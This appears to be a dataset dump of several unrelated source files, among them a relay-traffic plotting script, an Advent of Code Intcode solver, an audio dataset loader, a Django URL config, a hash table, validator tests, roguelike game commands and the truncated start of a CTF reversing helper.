elif m_r1 > m_r2: return 1
else: return -1
elif len(relays_1) > len(relays_2):
return 1
else:
return -1
sample = draw_sample(records, sample_size)
sample.sort(cmp=rec_cmp)
N_CLUSTERS = 6
colors =[(1.0*i/N_CLUSTERS,)*3 for i in xrange(1, N_CLUSTERS+1)]
cmap = ListedColormap(colors)
relay_series = [record['relays'] for record in sample]
in_relay_series = []
out_relay_series = []
for r in relay_series:
newTupIn = []
newTupOut = []
for tup in r:
newTupIn.append(tup[0])
newTupOut.append(tup[1])
in_relay_series.append(newTupIn)
out_relay_series.append(newTupOut)
vmin = 0
vmax = VMAX
if ax is None:
fig = plt.figure()
fig.canvas.mpl_connect('pick_event', on_pick)
ax = fig.add_subplot(221)
ax.get_yaxis().set_ticks([])
if not no_chrome:
plt.title("Inbound Luminance Plot (n=%i)" % len(sample))
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Client")
# legend_rects = [Rectangle((0, 0), 1, 1, fc=c) for c in reversed(colors)]
# legend_labels = ["%i-%i cells" % c for c in reversed(cluster_ranges)]
# plt.legend(legend_rects, legend_labels, loc=4)
n = 0
for i in xrange(0, len(sample)):
series = in_relay_series[i]
ident = sample[i]['ident']
artist = ax.scatter(range(0, len(series)), [n]*len(series),
c=series, marker="s", edgecolors='none', vmin=vmin, vmax=vmax,
cmap=cm.gray, picker=True)
n += 2
artist_ident_map[ident] = artist
if ay is None:
ay = fig.add_subplot(223)
ay.get_yaxis().set_ticks([])
if not no_chrome:
plt.title("Outbound Luminance Plot (n=%i)" % len(sample))
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Client")
# legend_rects = [Rectangle((0, 0), 1, 1, fc=c) for c in reversed(colors)]
# legend_labels = ["%i-%i cells" % c for c in reversed(cluster_ranges)]
# plt.legend(legend_rects, legend_labels, loc=4)
n = 0
for i in xrange(0, len(sample)):
series = out_relay_series[i]
ident = sample[i]['ident']
artist = ay.scatter(range(0, len(series)), [n]*len(series),
c=series, marker="s", edgecolors='none', vmin=vmin, vmax=vmax,
cmap=cm.gray, picker=True)
n += 2
artist_ident_map[ident] = artist
fig.tight_layout()
if not no_chrome:
fig.subplots_adjust(right=1.0)
cbar_ax = fig.add_axes([0.55, 0.15, 0.025, 0.7])
fig.colorbar(artist, cax=cbar_ax)
if __name__ == "__main__":
graphing_mode = sys.argv[1]
inpath = sys.argv[2]
if len(sys.argv) > 4: seed = int(sys.argv[3])
else: seed = 0
print "Random seed =", seed
random.seed(seed)
ts_ident_list = []
with open(inpath) as data_file:
print "Reading data..."
data = cPickle.load(data_file)
window_size, records = data['window_size'], data['records']
if graphing_mode == "-timeplot":
for arg in range(len(sys.argv)):
if arg >= 5:
ts_ident_list.append(sys.argv[arg])
elif graphing_mode == "-agg-colorplots":
k_val = int(sys.argv[4])
records = filter(lambda r: r['ident'] == (k_val, k_val), records)
print "%i series" % len(records)
print "Graphing..."
if graphing_mode == '-summarize':
do_summarize(records)
elif graphing_mode == '-horizon':
do_horizon(records, window_size)
elif graphing_mode == '-timeplot':
do_timeplot(records, window_size, ts_ident_list)
elif graphing_mode == '-colorplots':
do_colorplot(records, window_size)
elif graphing_mode == '-agg-colorplots':
do_colorplot(records, window_size)
do_horizon(records, window_size, MAX_OBS)
else:
print "ERROR: Invalid graphing mode selected"
plt.show()
|
[
"spattarawutt@gmail.com"
] |
spattarawutt@gmail.com
|
85a7bdd7a9ae0094ba0970d2c19c7db253851acb
|
4b866626551640b701274cc1f6a8ea8966199c2d
|
/2019/Day_07/day7_Amplification_Circuit_Class.py
|
75f27a0663e2174a2a88387170563beb80085fc8
|
[] |
no_license
|
MaxTechniche/AdventOfCode
|
5a496b03c4348214a3abd990c5de8e10bd3a4fff
|
8d67cc151abc686cb06770422b795307f7cff170
|
refs/heads/main
| 2023-02-03T00:55:35.057710
| 2022-12-18T23:21:47
| 2022-12-18T23:21:47
| 307,274,063
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,408
|
py
|
og = [3,8,1001,8,10,8,105,1,0,0,21,46,67,76,101,118,199,280,361,442,99999,3,9,1002,9,4,9,1001,9,2,9,102,3,9,9,101,3,9,9,102,2,9,9,4,9,99,3,9,1001,9,3,9,102,2,9,9,1001,9,2,9,1002,9,3,9,4,9,99,3,9,101,3,9,9,4,9,99,3,9,1001,9,2,9,1002,9,5,9,101,5,9,9,1002,9,4,9,101,5,9,9,4,9,99,3,9,102,2,9,9,1001,9,5,9,102,2,9,9,4,9,99,3,9,1002,9,2,9,4,9,3,9,1002,9,2,9,4,9,3,9,101,2,9,9,4,9,3,9,101,1,9,9,4,9,3,9,102,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,1002,9,2,9,4,9,3,9,101,1,9,9,4,9,3,9,102,2,9,9,4,9,3,9,101,2,9,9,4,9,99,3,9,101,1,9,9,4,9,3,9,1002,9,2,9,4,9,3,9,102,2,9,9,4,9,3,9,101,1,9,9,4,9,3,9,101,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,101,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,1002,9,2,9,4,9,3,9,101,2,9,9,4,9,99,3,9,1001,9,1,9,4,9,3,9,1002,9,2,9,4,9,3,9,1002,9,2,9,4,9,3,9,101,1,9,9,4,9,3,9,102,2,9,9,4,9,3,9,1001,9,1,9,4,9,3,9,1002,9,2,9,4,9,3,9,1001,9,1,9,4,9,3,9,101,1,9,9,4,9,3,9,101,2,9,9,4,9,99,3,9,1002,9,2,9,4,9,3,9,1001,9,1,9,4,9,3,9,101,2,9,9,4,9,3,9,101,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,101,1,9,9,4,9,3,9,1001,9,2,9,4,9,99,3,9,102,2,9,9,4,9,3,9,102,2,9,9,4,9,3,9,101,2,9,9,4,9,3,9,101,1,9,9,4,9,3,9,101,2,9,9,4,9,3,9,1001,9,2,9,4,9,3,9,1001,9,2,9,4,9,3,9,101,2,9,9,4,9,3,9,1002,9,2,9,4,9,3,9,101,2,9,9,4,9,99]
og = [3,15,3,16,1002,16,10,16,1,16,15,15,4,15,99,0,0]
class Amp():
def __init__(self, phase, sequence=og):
self.phase = phase
self.sequence = sequence
self.phase_used = False
self.four_value = None
def run(self, input_):
self.pos = 0
self.input_ = input_
while self.pos < len(self.sequence):
x = str(self.sequence[self.pos])
while len(x) < 5:
x = '0' + x
ones = int(x[-3])
twos = int(x[-4])
threes=int(x[-5])
code = int(x[-2:])
if code == 99:
return self.four_value
if ones == 0:
try:
one_spot = self.sequence[self.pos+1]
except IndexError:
one_spot = None
else:
one_spot = self.pos+1
if twos == 0:
try:
two_spot = self.sequence[self.pos+2]
except IndexError:
two_spot = None
else:
two_spot = self.pos+2
if threes == 0:
try:
three_spot = self.sequence[self.pos+3]
except IndexError:
three_spot = None
else:
three_spot = self.pos+3
self.spots = (0, one_spot, two_spot, three_spot)
self.process_code(code)
def process_code(self, code):
print(self.sequence)
if code == 1:
self.one()
elif code == 2:
self.two()
elif code == 3:
self.three()
elif code == 4:
self.four()
elif code == 5:
self.five()
elif code == 6:
self.six()
elif code == 7:
self.seven()
elif code == 8:
self.eight()
def one(self):
self.sequence[self.spots[3]] = self.sequence[self.spots[1]] + \
self.sequence[self.spots[2]]
self.pos += 4
def two(self):
self.sequence[self.spots[3]] = self.sequence[self.spots[1]] * \
self.sequence[self.spots[2]]
self.pos += 4
def three(self):
if self.phase_used:
self.sequence[self.spots[1]] = self.input_
else:
self.sequence[self.spots[1]] = self.phase
self.phase_used = True
self.pos += 2
def four(self):
if self.sequence[self.spots[1]]:
self.four_value = self.sequence[self.spots[1]]
self.pos += 2
def five(self):
if self.sequence[self.spots[1]] != 0:
self.pos = self.sequence[self.spots[2]]
else:
self.pos += 3
def six(self):
if self.sequence[self.spots[1]]:
self.pos += 3
else:
self.pos = self.sequence[self.spots[2]]
def seven(self):
if self.sequence[self.spots[1]] < self.sequence[self.spots[2]]:
self.sequence[self.spots[3]] = 1
else:
self.sequence[self.spots[3]] = 0
self.pos += 4
def eight(self):
if self.sequence[self.spots[1]] == self.sequence[self.spots[2]]:
self.sequence[self.spots[3]] = 1
else:
self.sequence[self.spots[3]] = 0
self.pos += 4
from itertools import permutations
input_1 = 0
best_thrust = 0
for combo in permutations([5, 6, 7, 8, 9], 5):
print(combo)
amp_list = []
for phase in combo:
amp_list.append(Amp(phase, og.copy()))
combo_score = 0
x = 0
output = amp_list[x].run(input_1)
combo_score += output
while output:
if x > 3:
x = 0
else:
x += 1
if output == True:
break
combo_score += output
output = amp_list[x].run(output)
best_thrust = max(best_thrust, combo_score)
print(best_thrust)
|
[
"jacobcarlmaxfield@gmail.com"
] |
jacobcarlmaxfield@gmail.com
|
f9dce4240433ce38d9194cea922badddef39792a
|
391bca5157a1de3f94cb4dfbd7d3cd83665d0be5
|
/audioDatasetHdf.py
|
b6ee1017bdaa7b7193040ec9c2d6cbd5a98d442b
|
[] |
no_license
|
yogurtss/dual_path
|
69470ff1ebba63d32c95b988d51e8f73bd21b702
|
479bba58326058af6e41018b2e0037319fe7ee8c
|
refs/heads/master
| 2021-05-19T14:10:28.672095
| 2020-03-31T21:58:44
| 2020-03-31T21:58:44
| 251,749,967
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,711
|
py
|
import musdb
import soundfile
import os
import librosa as lib
from tqdm import tqdm
import numpy as np
import torch
from sortedcontainers import SortedList
import h5py
import torch.nn as nn
from dataset.util import *
def getMUSDB(database_path):
    # load the MUSDB dataset
mus = musdb.DB(root=database_path, is_wav=False)
subsets = list()
for subset in ["train", "test"]:
tracks = mus.load_mus_tracks(subset)
samples = list()
# Go through tracks
for track in tracks:
# Skip track if mixture is already written, assuming this track is done already
# track_path = track.path[:-4]
track_path = SAVE_PATH + subset + '/' + track.name
if not os.path.exists(track_path):
os.mkdir(track_path)
mix_path = track_path + "/mix.wav"
acc_path = track_path + "/accompaniment.wav"
if os.path.exists(mix_path):
print("WARNING: Skipping track " + mix_path + " since it exists already")
# Add paths and then skip
paths = {"mix": mix_path, "accompaniment": acc_path}
paths.update({key: track_path + "_" + key + ".wav" for key in ["bass", "drums", "other", "vocals"]})
samples.append(paths)
continue
rate = track.rate
# Go through each instrument
paths = dict()
stem_audio = dict()
for stem in ["bass", "drums", "other", "vocals"]:
path = track_path + '/' + stem + ".wav"
audio = track.targets[stem].audio.T
soundfile.write(path, audio, rate, "PCM_16")
stem_audio[stem] = audio
paths[stem] = path
# Add other instruments to form accompaniment
acc_audio = np.clip(sum([stem_audio[key] for key in list(stem_audio.keys()) if key != "vocals"]), -1.0, 1.0)
soundfile.write(acc_path, acc_audio, rate, "PCM_16")
paths["accompaniment"] = acc_path
# Create mixture
mix_audio = track.audio.T
soundfile.write(mix_path, mix_audio, rate, "PCM_16")
paths["mix"] = mix_path
diff_signal = np.abs(mix_audio - acc_audio - stem_audio["vocals"])
print("Maximum absolute deviation from source additivity constraint: " + str(
np.max(diff_signal))) # Check if acc+vocals=mix
print("Mean absolute deviation from source additivity constraint: " + str(np.mean(diff_signal)))
samples.append(paths)
subsets.append(samples)
train_val_list = subsets[0]
test_list = subsets[1]
np.random.seed(42)
train_list = np.random.choice(train_val_list, 75, replace=False)
val_list = [elem for elem in train_val_list if elem not in train_list]
dataset = {'train': train_list,
'val': val_list,
'test': test_list}
return dataset
class AudioDataset(nn.Module):
def __init__(self, partition, instruments, sr, channels, out_channels, random_hops, hdf_dir, shapes, audio_transform=None, in_memory=False):
super(AudioDataset, self).__init__()
self.hdf_dir = os.path.join(hdf_dir, partition + ".hdf5")
self.random_hops = random_hops
self.sr = sr
self.channels = channels
self.audio_transform = audio_transform
self.in_memory = in_memory
self.instruments = instruments
self.shapes = shapes
self.out_channels = out_channels
print('Preparing {} dataset...'.format(partition))
# Go through HDF and collect lengths of all audio files
with h5py.File(self.hdf_dir, "r") as f:
lengths = [f[str(song_idx)].attrs["target_length"] for song_idx in range(len(f))]
# Subtract input_size from lengths and divide by hop size to determine number of starting positions
lengths = [(l // self.shapes['length']) + 1 for l in lengths]
self.start_pos = SortedList(np.cumsum(lengths))
self.length = self.start_pos[-1]
self.dataset = h5py.File(self.hdf_dir, 'r', driver="core")
def __len__(self):
return self.length
def __getitem__(self, idx):
# Find out which slice of targets we want to read
audio_idx = self.start_pos.bisect_right(idx)
if audio_idx > 0:
idx = idx - self.start_pos[audio_idx - 1]
# Check length of audio signal
audio_length = self.dataset[str(audio_idx)].attrs["length"]
target_length = self.dataset[str(audio_idx)].attrs["target_length"]
# Determine position where to start targets
if self.random_hops:
start_target_pos = np.random.randint(0, max(target_length - self.shapes['length'] + 1, 1))
else:
# Map item index to sample position within song
start_target_pos = idx * self.shapes['length']
start_pos = start_target_pos
if start_pos < 0:
# Pad manually since audio signal was too short
pad_front = abs(start_pos)
start_pos = 0
else:
pad_front = 0
end_pos = start_target_pos + self.shapes['length']
if end_pos > audio_length:
# Pad manually since audio signal was too short
pad_back = end_pos - audio_length
end_pos = audio_length
else:
pad_back = 0
# Read and return
audio = self.dataset[str(audio_idx)]["inputs"][:, start_pos:end_pos].astype(np.float32)
if pad_front > 0 or pad_back > 0:
audio = np.pad(audio, [(0, 0), (pad_front, pad_back)], mode="constant", constant_values=0.0)
targets = self.dataset[str(audio_idx)]["targets"][:, start_pos:end_pos].astype(np.float32)
if pad_front > 0 or pad_back > 0:
targets = np.pad(targets, [(0, 0), (pad_front, pad_back)], mode="constant", constant_values=0.0)
sources = {}
for id, inst in enumerate(self.instruments.keys()):
sources[inst] = targets[id * self.channels:(id + 1) * self.channels]
del targets
if hasattr(self, "audio_transform") and self.audio_transform is not None:
audio, sources = self.audio_transform(audio, sources)
idx_temp = 0
targets = np.zeros([self.out_channels, self.shapes['length']], dtype=np.float32)
if self.out_channels == 1:
targets = sources['accompaniment']
else:
for k in sources.keys():
if k == 'other':
continue
targets[idx_temp] = sources[k]
idx_temp += 1
return torch.tensor(audio).squeeze(), torch.tensor(targets)
if __name__ == '__main__':
partition = 'train'
INSTRUMENTS = {"bass": True,
"drums": True,
"other": True,
"vocals": True,
"accompaniment": True}
shapes = {'start_frame': 6140,
'end_frame': 51201,
'output_len': 45061,
'input_len': 57341}
sr = 22050
channels = 1
augment_func = lambda mix, targets: random_amplify(mix, targets, 0.7, 1.0, shapes)
crop_func = lambda mix, targets: crop(mix, targets, shapes)
dataset = AudioDataset(partition, INSTRUMENTS, sr, channels, 2, True, hdf_dir='../H5/', shapes=shapes, audio_transform=augment_func)
dataset[0]
dataset[1]
print('test')
|
[
"noreply@github.com"
] |
yogurtss.noreply@github.com
|
e28726924a187a1dcb5a4094e5ec1bb966898601
|
1777f5e6f3129e5e2df75161f669eb0531355a0b
|
/myweb/mysite/mysite/urls.py
|
d8a926e25371899e3a82b7ef589d0b22daf50f5b
|
[] |
no_license
|
HakimdarC/CRUD-project-Django-Django
|
ca52b3420a3e25fcebea7f855102a9e306dcbb19
|
4fe51989e1be7940331ddb89ccc7992a6a49559a
|
refs/heads/master
| 2022-10-08T04:01:41.530990
| 2019-07-26T12:04:02
| 2019-07-26T12:04:02
| 195,555,184
| 0
| 1
| null | 2022-10-03T14:09:50
| 2019-07-06T15:33:10
|
Python
|
UTF-8
|
Python
| false
| false
| 982
|
py
|
"""mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from myapp import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from . import views
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [
path('', views.index, name='index'),
path('myapp/', include("myapp.urls"), name='myapp'),
path('admin/', admin.site.urls)
]
urlpatterns += staticfiles_urlpatterns()
|
[
"moseshakim23@gmail.com"
] |
moseshakim23@gmail.com
|
736d14a11bc8f5c100eaeef9314edb90e4aed66d
|
775a51872851cd8d60ecf7b6c5f2a46103bc0bbc
|
/Dict-Hashing.py
|
68b469e28de0edb396baf1b468ec90496094f53a
|
[] |
no_license
|
Prabhanda-Akiri/Data-Structures-Implementation
|
08e285c29f7ed6794f937cf79e6d8f3cc7b18b99
|
d184b01889cbe68ec9ed033a353867a12e7f6edd
|
refs/heads/master
| 2021-01-20T10:46:45.927412
| 2018-01-22T08:43:46
| 2018-01-22T08:43:46
| 101,647,843
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,494
|
py
|
class LinkedList:
"""Defines a Singly Linked List.
attributes: head
"""
def __init__(self):
"""Create a new list with a Sentinel Node"""
self.head=ListNode('a')
    def insert(self,x,s):
        """Insert value x with key s at the head of the list."""
self.temp=ListNode(s)
self.temp.value=x
self.temp.next=self.head.next
self.head.next=self.temp
    def delete(self,p):
        """Delete the first node whose key equals p."""
temp=self.searc(p)
temp.next=temp.next.next
def printlist(self):
""" Print all the elements of a list in a row."""
self.temp=ListNode('a')
self.temp=self.head.next
while self.temp != None :
print (self.temp.value)
print(self.temp.s)
self.temp=self.temp.next
    def search(self,x):
        """Return the 0-based position of the first node whose key equals x, or the last index if x is absent."""
self.temp=ListNode('a')
self.temp=self.head
c=-1
while self.temp.next!=None :
self.temp=self.temp.next
c=c+1
if self.temp.s == x :
return c
return c
    def searc(self,x):
        """Return the node preceding the first node whose key equals x (the sentinel head if x is absent)."""
self.temp=ListNode('a')
self.temp=self.head
while self.temp.next!=None :
if self.temp.next.s == x :
return self.temp
self.temp=self.temp.next
return self.head
def len(self):
"""Return the length (the number of elements) in the Linked List."""
self.temp=ListNode('a')
self.temp=self.head.next
self.count=0
while self.temp!=None:
self.count=self.count+1
self.temp=self.temp.next
return self.count
class ListNode:
"""Represents a node of a Singly Linked List.
attributes: value, next.
"""
def __init__(self,s):
self.value=0
self.s=s
self.next=None
class HashTable :
def __init__(self) :
self.T=[None for i in range(30)]
for i in range (0,30):
self.T[i]=LinkedList()
def ins(self,s) :
x=s
n=len(x)
k=0
for i in range(0,n) :
k=k+ord(x[i])
h_k=k % 30
print('the list in T[',h_k,'] is')
self.T[h_k].insert(k,s)
self.T[h_k].printlist()
def dele(self,s) :
x=s
n=len(x)
k=0
for i in range(0,n) :
k=k+ord(x[i])
h_k=k % 30
self.T[h_k].delete(s)
print('the list in T[',h_k,'] is')
self.T[h_k].printlist()
def sear(self,s) :
x=s
n=len(x)
k=0
for i in range(0,n) :
k=k+ord(x[i])
h_k=k % 30
print('the string',s,'is present in',h_k,'th column of hash table and in the following position of linked list')
return self.T[h_k].search(k)
def main():
h=HashTable()
h.ins('apple')
h.ins('ball')
h.ins('cat')
h.ins('act')
h.ins('tac')
h.ins('atc')
print(h.sear('cat'))
h.dele('tac')
if __name__ == '__main__':
main()
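# --- Hedged worked example (not part of the original file) ---
# The hash of a string is the sum of its character codes modulo 30, so the
# anagrams 'cat', 'act' and 'tac' above all land in the same bucket:
# ord('c') + ord('a') + ord('t') = 99 + 97 + 116 = 312, and 312 % 30 = 12.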
|
[
"noreply@github.com"
] |
Prabhanda-Akiri.noreply@github.com
|
2b900473f8ebad3774236008a4ce12609bd077c4
|
c4af67db4c523d20f2d55aef90ba77db1fb53c38
|
/validation/tests/test_validation.py
|
c1128b9d609b6db323abf0d49d809d2207be7177
|
[] |
no_license
|
dtgit/dtedu
|
e59b16612d7d9ea064026bf80a44657082ef45a3
|
d787885fe7ed0de6f9e40e9b05d852a0e9d60677
|
refs/heads/master
| 2020-04-06T05:22:50.025074
| 2009-04-08T20:13:20
| 2009-04-08T20:13:20
| 171,351
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,060
|
py
|
from Testing import ZopeTestCase
from Products.Archetypes.tests.atsitetestcase import ATSiteTestCase
from Testing.ZopeTestCase import doctest
from Products.validation import validation
class TestValidation(ATSiteTestCase):
def test_inNumericRange(self):
v = validation.validatorFor('inNumericRange')
self.failUnlessEqual(v(10, 1, 20), 1)
self.failUnlessEqual(v('10', 1, 20), 1)
self.failIfEqual(v(0, 4, 5), 1)
def test_isPrintable(self):
v = validation.validatorFor('isPrintable')
self.failUnlessEqual(v('text'), 1)
self.failIfEqual(v('\u203'), 1)
self.failIfEqual(v(10), 1)
def test_isSSN(self):
v = validation.validatorFor('isSSN')
self.failUnlessEqual(v('111223333'), 1)
self.failUnlessEqual(v('111-22-3333', ignore=r'-'), 1)
def test_isUSPhoneNumber(self):
v = validation.validatorFor('isUSPhoneNumber')
self.failUnlessEqual(v('(212) 555-1212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('2125551212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('(212) 555-1212'), 1)
def test_isURL(self):
v = validation.validatorFor('isURL')
self.failUnlessEqual(v('http://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('https://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('irc://tiran@irc.freenode.net:6667/#plone'), 1)
self.failUnlessEqual(v('fish://tiran:password@myserver/~/'), 1)
self.failIfEqual(v('http://\n'), 1)
self.failIfEqual(v('../foo/bar'), 1)
def test_isEmail(self):
v = validation.validatorFor('isEmail')
self.failUnlessEqual(v('test@test.com'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('me'), 1)
def test_isMailto(self):
v = validation.validatorFor('isMailto')
self.failUnlessEqual(v('mailto:test@test.com'), 1)
self.failIfEqual(v('test@test.com'), 1)
self.failIfEqual(v('mailto:@foo.bar'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('mailto:'), 1)
self.failIfEqual(v('me'), 1)
def test_isUnixLikeName(self):
v = validation.validatorFor('isUnixLikeName')
self.failUnlessEqual(v('abcd'), 1)
self.failUnless(v('a_123456'), 1)
self.failIfEqual(v('123'), 1)
self.failIfEqual(v('ab.c'), 1)
self.failIfEqual(v('ab,c'), 1)
self.failIfEqual(v('aaaaaaaab'), 1) # too long
def test_isValidId(self):
v = validation.validatorFor("isValidId")
self.failIfEqual(v("a b", object()), 1)
# TODO: more tests require a site
def test_suite():
from unittest import TestSuite, makeSuite
suite = TestSuite()
suite.addTest(makeSuite(TestValidation))
doctests = (
'Products.validation.validators.ExpressionValidator',
)
for module in doctests:
suite.addTest(doctest.DocTestSuite(module))
return suite
|
[
"ron@domU-12-31-39-02-65-03.compute-1.internal"
] |
ron@domU-12-31-39-02-65-03.compute-1.internal
|
c142161627e8cc6cd58d55944d32e4c84a8c57d9
|
123d70d21419fbdf6939135e09b263f145f4174e
|
/new/plomrogue/commands.py
|
744d471fac100bc5e326813899d93466a353566e
|
[] |
no_license
|
plomlompom/plomrogue2-experiments
|
53aaf24ca88bc49bc21d13616de5126fa488ee31
|
a466115714f7da37c45d3fd0d054d67f85a725f0
|
refs/heads/master
| 2021-01-20T00:28:33.601033
| 2019-05-13T11:13:26
| 2019-05-13T11:13:26
| 89,135,617
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,931
|
py
|
from plomrogue.misc import quote
def cmd_GEN_WORLD(game, yx, seed):
game.make_new_world(yx, seed)
cmd_GEN_WORLD.argtypes = 'yx_tuple:pos int:nonneg'
def cmd_GET_GAMESTATE(game, connection_id):
"""Send game state to caller."""
game.send_gamestate(connection_id)
def cmd_SEED(game, seed):
game.rand.prngod_seed = seed
cmd_SEED.argtypes = 'int:nonneg'
def cmd_MAP_SIZE(game, size):
game.map_size = size
cmd_MAP_SIZE.argtypes = 'yx_tuple:pos'
def cmd_MAP(game, map_pos):
"""Ensure (possibly empty/'?'-filled) map at position map_pos."""
game.get_map(map_pos)
cmd_MAP.argtypes = 'yx_tuple'
def cmd_THING_TYPE(game, i, type_):
t_old = game.get_thing(i)
t_new = game.thing_types[type_](game, i)
#attr_names_of_old = [name for name in dir(t_old) where name[:2] != '__']
#attr_names_of_new = [name for name in dir(t_new) where name[:2] != '__']
#class_new = type(t_new)
#for attr_name in [v for v in attr_names_of_old if v in attr_names_of_new]:
# if hasattr(class_new, attr_name):
# attr_new = getattr(class_new, attr_name)
# if type(attr_new) == property and attr_new.fset is None:
# continue # ignore read-only properties on t_new
# attr_old = getattr(t_old, attr_name)
# attr_new = getattr(t_new, attr_name)
# if type(attr_old) != type(attr_new):
# continue
# setattr(t_new, attr_name, attr_old)
t_new.position = t_old.position
t_new.in_inventory = t_old.in_inventory
t_old_index = game.things.index(t_old)
game.things[t_old_index] = t_new
cmd_THING_TYPE.argtypes = 'int:nonneg string:thingtype'
def cmd_THING_POS(game, i, big_yx, small_yx):
t = game.get_thing(i)
t.position = (big_yx, small_yx)
cmd_THING_POS.argtypes = 'int:nonneg yx_tuple yx_tuple:nonneg'
def cmd_THING_INVENTORY(game, id_, ids):
carrier = game.get_thing(id_)
carrier.inventory = ids
for id_ in ids:
t = game.get_thing(id_)
t.in_inventory = True
t.position = carrier.position
cmd_THING_INVENTORY.argtypes = 'int:nonneg seq:int:nonneg'
def cmd_THING_HEALTH(game, id_, health):
t = game.get_thing(id_)
t.health = health
cmd_THING_HEALTH.argtypes = 'int:nonneg int:nonneg'
def cmd_GET_PICKABLE_ITEMS(game, connection_id):
pickable_ids = game.player.get_pickable_items()
if len(pickable_ids) > 0:
game.io.send('PICKABLE_ITEMS %s' %
','.join([str(id_) for id_ in pickable_ids]))
else:
game.io.send('PICKABLE_ITEMS ,')
def cmd_TERRAIN_LINE(game, big_yx, y, terrain_line):
game.maps[big_yx].set_line(y, terrain_line)
cmd_TERRAIN_LINE.argtypes = 'yx_tuple int:nonneg string'
def cmd_PLAYER_ID(game, id_):
# TODO: test whether valid thing ID
game.player_id = id_
cmd_PLAYER_ID.argtypes = 'int:nonneg'
def cmd_TURN(game, n):
game.turn = n
cmd_TURN.argtypes = 'int:nonneg'
def cmd_SWITCH_PLAYER(game):
game.player.set_task('WAIT')
thing_ids = [t.id_ for t in game.things]
player_index = thing_ids.index(game.player.id_)
if player_index == len(thing_ids) - 1:
game.player_id = thing_ids[0]
else:
game.player_id = thing_ids[player_index + 1]
game.proceed()
def cmd_SAVE(game):
def write(f, msg):
f.write(msg + '\n')
save_file_name = game.io.game_file_name + '.save'
with open(save_file_name, 'w') as f:
write(f, 'TURN %s' % game.turn)
write(f, 'SEED %s' % game.rand.prngod_seed)
write(f, 'MAP_SIZE %s' % (game.map_size,))
for map_pos in game.maps:
write(f, 'MAP %s' % (map_pos,))
for map_pos in game.maps:
for y, line in game.maps[map_pos].lines():
write(f, 'TERRAIN_LINE %s %5s %s' % (map_pos, y, quote(line)))
for thing in game.things:
write(f, 'THING_TYPE %s %s' % (thing.id_, thing.type_))
write(f, 'THING_POS %s %s %s' % (thing.id_, thing.position[0],
thing.position[1]))
if hasattr(thing, 'health'):
write(f, 'THING_HEALTH %s %s' % (thing.id_, thing.health))
if len(thing.inventory) > 0:
write(f, 'THING_INVENTORY %s %s' %
(thing.id_,','.join([str(i) for i in thing.inventory])))
else:
write(f, 'THING_INVENTORY %s ,' % thing.id_)
if hasattr(thing, 'task'):
task = thing.task
if task is not None:
task_args = task.get_args_string()
task_name = [k for k in game.tasks.keys()
if game.tasks[k] == task.__class__][0]
write(f, 'SET_TASK:%s %s %s %s' % (task_name, thing.id_,
task.todo, task_args))
write(f, 'PLAYER_ID %s' % game.player_id)
cmd_SAVE.dont_save = True
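# --- Hedged illustration (not part of the original module) ---
# cmd_SAVE writes the world as one command per line, so a minimal save file
# could start like this (all values invented for illustration):
# TURN 3
# SEED 42
# MAP_SIZE (64, 64)
# MAP (0, 0)
# PLAYER_ID 0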
|
[
"c.heller@plomlompom.de"
] |
c.heller@plomlompom.de
|
b83e8246703e0232b938a556394aff5db7517139
|
e7b87b4377660adf9872a0fd361b2f66ef2f4cfa
|
/advent_2019/ChristmaSSE_KeyGen/reverse.py
|
1d66bf5fad064d0e78c99dbd0d0e4cc245d83362
|
[] |
no_license
|
passwd0/ctf
|
a215dbabfb0a97723e7e805c4938b833c454c166
|
e5a6e4769308ed6283e7e20c6852683bdac5cedd
|
refs/heads/master
| 2020-12-01T15:04:08.186238
| 2019-12-28T22:12:24
| 2019-12-28T22:12:24
| 230,649,411
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,513
|
py
|
#!/bin/python
from cachetools import cached, LRUCache, TTLCache
import time
import numpy as np
import struct
from unicorn import *
from unicorn.x86_const import *
#def internalCycle():
# return 0
# #m6 = m4
# #pcmpgtd xmm6, xmm3
# #paddd xmm6, xmm5
# #pmulld xmm6, xmm4
# #psubd xmm3, xmm6
# #movdqa xmm6, xmm4
# #pcmpgtd xmm6, xmm2
# #paddd xmm6, xmm5
# #pmulld xmm6, xmm4
# #psubd xmm2, xmm6
# #movdqa xmm6, xmm4
# #pcmpgtd xmm6, xmm1
# #paddd xmm6, xmm5
# #pmulld xmm6, xmm4
# #psubd xmm1, xmm6
# #movdqa xmm6, xmm4
# #pcmpgtd xmm6, xmm0
# #paddd xmm6, xmm5
# #pmulld xmm6, xmm4
# #psubd xmm0, xmm6
# #add edx, 0xffffffff
#
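# pshufd(src, order) mimics the SSE PSHUFD instruction: src is treated as four
# 32-bit lanes and the result is rebuilt by picking lanes according to the
# 2-bit fields of the order immediate.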
@cached(cache={})
def pshufd(src,order):
line=bin(src)[2:].rjust(128,"0")
n=32
src=[line[i:i+n] for i in range(0, len(line), n)][::-1]
#print(src)
line=bin(order)[2:].rjust(8,"0")
n=2
